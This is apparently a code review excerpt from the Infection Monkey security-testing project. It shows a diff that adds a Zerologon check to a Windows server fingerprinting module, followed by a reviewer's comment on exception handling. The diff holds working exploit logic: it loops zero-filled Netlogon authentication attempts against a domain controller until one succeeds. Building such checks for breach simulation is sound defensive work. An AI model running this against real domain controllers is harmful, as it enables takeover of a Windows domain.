monkey/infection_monkey/network/windowsserver_fingerprint.py

```
@@ -0,0 +1,116 @@
+            plaintext = b'\x00' * 8
+            ciphertext = b'\x00' * 8
+
+            # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
+            flags = 0x212fffff
+
+            # Send challenge and authentication request.
+            nrpc.hNetrServerReqChallenge(
+                rpc_con, DC_HANDLE + '\x00', DC_NAME + '\x00', plaintext)
+
+            try:
+                server_auth = nrpc.hNetrServerAuthenticate3(
+                    rpc_con, DC_HANDLE + '\x00', DC_NAME +
+                    '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+                    DC_NAME + '\x00', ciphertext, flags
+                )
+
+                # It worked!
+                assert server_auth['ErrorCode'] == 0
+                return rpc_con
+
+            except nrpc.DCERPCSessionError as ex:
+                if ex.get_error_code() == 0xc0000022:  # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
+                    pass
+                else:
+                    LOG.error(f'Unexpected error code: {ex.get_error_code()}.')
+                    unexpected_error_encountered = True
+
+            except BaseException as ex:
+                LOG.error(f'Unexpected error: {ex}.')
+                unexpected_error_encountered = True
+
+            return None
+
+        DC_IP = host.ip_addr
+        DC_NAME = self.get_dc_name(DC_IP)
+        DC_HANDLE = '\\\\' + DC_NAME
+
+        if DC_NAME:  # if it is a Windows DC
+            # Keep authenticating until successful. Expected average number of attempts needed: 256.
+            LOG.info('Performing Zerologon authentication attempts...')
+            rpc_con = None
+            for attempt in range(0, self.MAX_ATTEMPTS):
+                rpc_con = try_zero_authenticate(DC_HANDLE, DC_IP, DC_NAME)
+                if (rpc_con is not None) or (unexpected_error_encountered):
```

Just `catch` here. 
And instead of returning something, you should throw an error (in `try_zero_authenticate`). Unexpected error and "Expected" errors you throw should be properly named (as other exceptions in `common/utils/exceptions.py`).